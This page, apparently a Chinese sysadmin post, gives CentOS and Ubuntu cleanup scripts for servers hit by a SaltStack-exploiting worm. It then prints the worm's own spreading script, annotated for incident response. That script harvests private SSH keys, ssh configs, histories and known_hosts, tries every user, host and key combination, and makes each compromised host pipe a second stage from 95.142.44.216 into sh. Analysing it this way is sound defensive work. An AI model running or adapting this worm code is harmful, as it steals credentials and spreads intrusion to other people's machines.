salt 攻击病毒服务器修复脚本
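# centos 修复脚本 — CentOS remediation for a host compromised through the
# SaltStack vulnerability: kill the salt-related processes, strip the planted
# cron lines, disable the salt services, replace every authorized_keys with
# one trusted public key, and delete the dropped files under /tmp.
# Run as root.  Replace the placeholder in new_pubkey with your own new key
# before running.
#
# The worm reproduced further down this page reads the local private keys
# (id_rsa*, *.pem), ~/.ssh/config, known_hosts and bash history from the
# victim.  Those private keys must therefore be treated as leaked and
# replaced as well — this script only resets the authorized_keys side.
# Persistence outside /var/spool/cron (system cron directories, systemd
# units, rc scripts) is not examined here; review it by hand.

new_pubkey="<替换为你自己的新信任公钥>"

# 1) Stop the running salt/attacker processes.  The original
# ps|grep|awk|xargs chain also matched its own grep and the shell running
# this script (whose name contains "salt"), so our own PID and parent are
# excluded; xargs -r stays silent when nothing matches.
pgrep -f salt | grep -vx -e "$$" -e "$PPID" | xargs -r kill -9

# 2) Remove the cron lines the intruder added (anything fetching with wget
# or referencing salt).  This also drops legitimate lines that contain those
# words, so read the crontab listing printed at the end.
for cronfile in /var/spool/cron/*; do
  [ -f "$cronfile" ] || continue        # an unmatched glob stays literal
  sed -i -e '/wget/d' -e '/salt/d' -- "$cronfile"
done

# 3) Stop and disable the salt daemons so they do not return on reboot.
systemctl stop salt-minion
systemctl disable salt-minion
systemctl stop salt-master
systemctl disable salt-master

# 4) Reset root's authorized_keys to the single trusted key.  /root is used
# explicitly instead of ~ so the result does not depend on how sudo set HOME.
# The file is removed first so that a planted symlink is not written through.
rm -f /root/.ssh/authorized_keys
mkdir -p /root/.ssh
chmod 700 /root/.ssh
printf '%s\n' "$new_pubkey" > /root/.ssh/authorized_keys
chmod 600 /root/.ssh/authorized_keys

# 5) Same for every account under /home.  The account is taken from the
# directory's owner rather than its name, and the file is written by root and
# then chowned, which replaces the `sudo -u … sh -c '…'` command string the
# original assembled by concatenation.
for home in /home/*; do
  [ -d "$home" ] || continue
  owner=$(stat -c %U -- "$home")
  group=$(stat -c %G -- "$home")
  if ! id -u "$owner" >/dev/null 2>&1; then
    printf '%s %s\n' '--> skip, no account owns' "$home"
    continue
  fi
  printf '%s %s\n' '--> delete authorized_keys for user' "$home"
  rm -f -- "$home/.ssh/authorized_keys"
  printf '%s %s\n' '-->' "$owner"
  mkdir -p -- "$home/.ssh"
  chown -- "$owner:$group" "$home/.ssh"
  chmod 700 -- "$home/.ssh"
  printf '%s\n' "$new_pubkey" > "$home/.ssh/authorized_keys"
  chown -- "$owner:$group" "$home/.ssh/authorized_keys"
  chmod 600 -- "$home/.ssh/authorized_keys"
done

# 6) Delete the dropped payload files (the indicator on this page is /tmp/sal*).
rm -f /tmp/sal*

# ---- Verification ----
echo "--------> 1) every authorized_keys should now hold only the new key"
for keyfile in /root/.ssh/authorized_keys /home/*/.ssh/authorized_keys; do
  [ -f "$keyfile" ] || continue
  printf '== %s\n' "$keyfile"
  cat -- "$keyfile"
done
echo "--------> 2) remaining crontab contents (should contain no wget/salt lines)"
for cronfile in /var/spool/cron/*; do
  [ -f "$cronfile" ] || continue
  printf '== %s\n' "$cronfile"
  cat -- "$cronfile"
done
echo "--------> 3) leftover files in /tmp (a 'No such file' error here means none)"
ls -l /tmp/sa*                          # ll is an interactive alias, not a command
echo "--------> 4) leftover salt processes (empty means none; the [s]alt trick hides grep itself)"
ps -elf | grep '[s]alt'
echo "Private keys were leaked: change every plaintext password stored on these servers."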
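# ====================
# ubuntu 修复脚本 — Ubuntu remediation for a host compromised through the
# SaltStack vulnerability: kill the salt-related processes, strip the planted
# cron lines, disable the salt services, replace every authorized_keys with
# one trusted public key, and delete the dropped files under /tmp.
# Run as root.  Replace the placeholder in new_pubkey with your own new key
# before running.  Differs from the CentOS variant only in the crontab
# directory (/var/spool/cron/crontabs).
#
# The worm reproduced further down this page reads the local private keys
# (id_rsa*, *.pem), ~/.ssh/config, known_hosts and bash history from the
# victim.  Those private keys must therefore be treated as leaked and
# replaced as well — this script only resets the authorized_keys side.
# Persistence outside /var/spool/cron/crontabs (system cron directories,
# systemd units, rc scripts) is not examined here; review it by hand.

new_pubkey="<替换为你自己的新信任公钥>"

# 1) Stop the running salt/attacker processes.  The original
# ps|grep|awk|xargs chain also matched its own grep and the shell running
# this script (whose name contains "salt"), so our own PID and parent are
# excluded; xargs -r stays silent when nothing matches.
pgrep -f salt | grep -vx -e "$$" -e "$PPID" | xargs -r kill -9

# 2) Remove the cron lines the intruder added (anything fetching with wget
# or referencing salt).  This also drops legitimate lines that contain those
# words, so read the crontab listing printed at the end.
for cronfile in /var/spool/cron/crontabs/*; do
  [ -f "$cronfile" ] || continue        # an unmatched glob stays literal
  sed -i -e '/wget/d' -e '/salt/d' -- "$cronfile"
done

# 3) Stop and disable the salt daemons so they do not return on reboot.
systemctl stop salt-minion
systemctl disable salt-minion
systemctl stop salt-master
systemctl disable salt-master

# 4) Reset root's authorized_keys to the single trusted key.  /root is used
# explicitly instead of ~ so the result does not depend on how sudo set HOME.
# The file is removed first so that a planted symlink is not written through.
rm -f /root/.ssh/authorized_keys
mkdir -p /root/.ssh
chmod 700 /root/.ssh
printf '%s\n' "$new_pubkey" > /root/.ssh/authorized_keys
chmod 600 /root/.ssh/authorized_keys

# 5) Same for every account under /home.  The account is taken from the
# directory's owner rather than its name, and the file is written by root and
# then chowned, which replaces the `sudo -u … sh -c '…'` command string the
# original assembled by concatenation.
for home in /home/*; do
  [ -d "$home" ] || continue
  owner=$(stat -c %U -- "$home")
  group=$(stat -c %G -- "$home")
  if ! id -u "$owner" >/dev/null 2>&1; then
    printf '%s %s\n' '--> skip, no account owns' "$home"
    continue
  fi
  printf '%s %s\n' '--> delete authorized_keys for user' "$home"
  rm -f -- "$home/.ssh/authorized_keys"
  printf '%s %s\n' '-->' "$owner"
  mkdir -p -- "$home/.ssh"
  chown -- "$owner:$group" "$home/.ssh"
  chmod 700 -- "$home/.ssh"
  printf '%s\n' "$new_pubkey" > "$home/.ssh/authorized_keys"
  chown -- "$owner:$group" "$home/.ssh/authorized_keys"
  chmod 600 -- "$home/.ssh/authorized_keys"
done

# 6) Delete the dropped payload files (the indicator on this page is /tmp/sal*).
rm -f /tmp/sal*

# ---- Verification ----
echo "--------> 1) every authorized_keys should now hold only the new key"
for keyfile in /root/.ssh/authorized_keys /home/*/.ssh/authorized_keys; do
  [ -f "$keyfile" ] || continue
  printf '== %s\n' "$keyfile"
  cat -- "$keyfile"
done
echo "--------> 2) remaining crontab contents (should contain no wget/salt lines)"
for cronfile in /var/spool/cron/crontabs/*; do
  [ -f "$cronfile" ] || continue
  printf '== %s\n' "$cronfile"
  cat -- "$cronfile"
done
echo "--------> 3) leftover files in /tmp (a 'No such file' error here means none)"
ls -l /tmp/sa*                          # ll is an interactive alias, not a command
echo "--------> 4) leftover salt processes (empty means none; the [s]alt trick hides grep itself)"
ps -elf | grep '[s]alt'
echo "Private keys were leaked: change every plaintext password stored on these servers."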
# 这是病毒通过入侵 salt 漏洞后,通过私钥进一步扩散传染的脚本。可以用来学习研究。 | |
#!/bin/sh | |
# Lateral-movement routine of the worm, kept here for analysis only.
# Stage 1 collects SSH credentials and candidate targets from the victim
# host; stage 2 tries every user x host x key x port combination and, on a
# successful login, makes the remote host download and run a second-stage
# script.  Incident-response reading of this function: every key file it
# enumerates (id_rsa*, IdentityFile entries, -i arguments from history, *.pem)
# has to be considered stolen, every host it enumerates may have received a
# key-based login from this machine, and the download address in the ssh
# commands is the network indicator to search for.
localgo() {
# Public IP of this host; only used to exclude the host itself from the
# /etc/hosts candidates below.  The outbound request to icanhazip.com is an
# early network artifact of the infection.
myhostip=$(curl -sL icanhazip.com)
# Private keys named id_rsa* (the .pub halves dropped) up to three levels
# under the home directories.
KEYS=$(find ~/ /root /home -maxdepth 3 -name 'id_rsa*' | grep -vw pub)
# Key paths declared as IdentityFile in every ssh client config it can read.
KEYS2=$(cat ~/.ssh/config /home/*/.ssh/config /root/.ssh/config | grep IdentityFile | awk -F "IdentityFile" '{print $2 }')
# Key paths given as "-i <file>" on ssh/scp lines in bash histories.
KEYS3=$(cat ~/.bash_history /home/*/.bash_history /root/.bash_history | grep -E "(ssh|scp)" | awk -F ' -i ' '{print $2}' | awk '{print $1'})
# Any *.pem file under the same directories (typically cloud-provider keys).
KEYS4=$(find ~/ /root /home -maxdepth 3 -name '*.pem' | uniq)
# Candidate targets, from six sources: HostName entries in ssh configs ...
HOSTS=$(cat ~/.ssh/config /home/*/.ssh/config /root/.ssh/config | grep HostName | awk -F "HostName" '{print $2}')
# ... IPv4 addresses on ssh/scp lines in bash history ...
HOSTS2=$(cat ~/.bash_history /home/*/.bash_history /root/.bash_history | grep -E "(ssh|scp)" | grep -oP "([0-9]{1,3}\.){3}[0-9]{1,3}")
# ... the host part of user@host on those same lines ...
HOSTS3=$(cat ~/.bash_history /home/*/.bash_history /root/.bash_history | grep -E "(ssh|scp)" | tr ':' ' ' | awk -F '@' '{print $2}' | awk -F '{print $1}')
# ... every IPv4 entry in /etc/hosts except loopback and this host ...
HOSTS4=$(cat /etc/hosts | grep -vw "0.0.0.0" | grep -vw "127.0.1.1" | grep -vw "127.0.0.1" | grep -vw $myhostip | sed -r '/\n/!s/[0-9.]+/\n&\n/;/^([0-9]{1,3}\.){3}[0-9]{1,3}\n/P;D' | awk '{print $1}')
# ... IPv4 addresses in known_hosts (hashed known_hosts entries do not match
# this dotted-quad regex, so HashKnownHosts starves this source) ...
HOSTS5=$(cat ~/*/.ssh/known_hosts /home/*/.ssh/known_hosts /root/.ssh/known_hosts | grep -oP "([0-9]{1,3}\.){3}[0-9]{1,3}" | uniq)
# ... and IPv4 addresses found in the command lines of running processes.
HOSTS6=$(ps auxw | grep -oP "([0-9]{1,3}\.){3}[0-9]{1,3}" | grep ":22" | uniq)
# Candidate usernames: root, the home-directory names that hold an id_rsa,
# and the user part of user@host from history.
USERZ=$(
echo "root"
find ~/ /root /home -maxdepth 2 -name '\.ssh' | uniq | xargs find | awk '/id_rsa/' | awk -F'/' '{print $3}' | uniq
)
USERZ2=$(cat ~/.bash_history /home/*/.bash_history /root/.bash_history | grep -vw "cp" | grep -vw "mv" | grep -vw "cd " | grep -vw "nano" | grep -v grep | grep -E "(ssh|scp)" | tr ':' ' ' | awk -F '@' '{print $1}' | awk '{print $4}' | uniq)
# Candidate ports: 22 plus any "-p" argument seen on ssh/scp lines in history.
pl=$(
echo "22"
cat ~/.bash_history /home/*/.bash_history /root/.bash_history | grep -vw "cp" | grep -vw "mv" | grep -vw "cd " | grep -vw "nano" | grep -v grep | grep -E "(ssh|scp)" | tr ':' ' ' | awk -F '-p' '{print $2}'
)
# Deduplicate each list while keeping first-seen order (number, unique by
# value, restore numeric order, strip the numbers).
sshports=$(echo "$pl" | tr ' ' '\n' | nl | sort -u -k2 | sort -n | cut -f2-)
userlist=$(echo "$USERZ $USERZ2" | tr ' ' '\n' | nl | sort -u -k2 | sort -n | cut -f2-)
hostlist=$(echo "$HOSTS $HOSTS2 $HOSTS3 $HOSTS4 $HOSTS5 $HOSTS6" | grep -vw 127.0.0.1 | tr ' ' '\n' | nl | sort -u -k2 | sort -n | cut -f2-)
keylist=$(echo "$KEYS $KEYS2 $KEYS3 $KEYS4" | tr ' ' '\n' | nl | sort -u -k2 | sort -n | cut -f2-)
# Stage 2: the full cartesian product; i counts attempts since the last pause.
i=0
for user in $userlist; do
for host in $hostlist; do
for key in $keylist; do
for sshp in $sshports; do
i=$((i+1))
# Every 20 attempts: sleep 20 s, then kill any ssh client still hanging.
# The resulting bursts of short-lived "ssh -o..." processes are a host-side
# detection opportunity.
if [ "${i}" -eq "20" ]; then
sleep 20
ps wx | grep "ssh -o" | awk '{print $1}' | xargs kill -9 &>/dev/null &
i=0
fi
#Wait 20 seconds after every 20 attempts and clean up hanging processes
# Force the stolen key into a mode ssh accepts; this rewrites the mode (and
# ctime) of the victim's own key files — a filesystem artifact worth checking.
chmod +r $key
chmod 400 $key
# Progress line: the attempted user@host, key and port.
echo "$user@$host $key $sshp"
# Non-interactive key login (no host-key prompt, BatchMode, 5 s timeout).
# On success the target fetches and pipes the second stage from
# 95.142.44.216 into sh, first under sudo and then as the plain user.  That
# address and the curl/wget-to-sh pattern are the indicators for proxy/DNS
# logs and shell histories; on the target, the login itself appears in the
# auth log as an ordinary public-key login from this host.
ssh -oStrictHostKeyChecking=no -oBatchMode=yes -oConnectTimeout=5 -i $key $user@$host -p$sshp "sudo curl -L http://95.142.44.216/s2.sh|sh; sudo wget -q -O - http://95.142.44.216/s2.sh|sh;"
ssh -oStrictHostKeyChecking=no -oBatchMode=yes -oConnectTimeout=5 -i $key $user@$host -p$sshp "curl -L http://95.142.44.216/s2.sh|sh; wget -q -O - http://95.142.44.216/s2.sh|sh;"
done
done
done
done
}
# Entry point: the harvest-and-spread routine runs once, unconditionally,
# as soon as the file is executed.
localgo
水平有限,不完善的地方欢迎补充!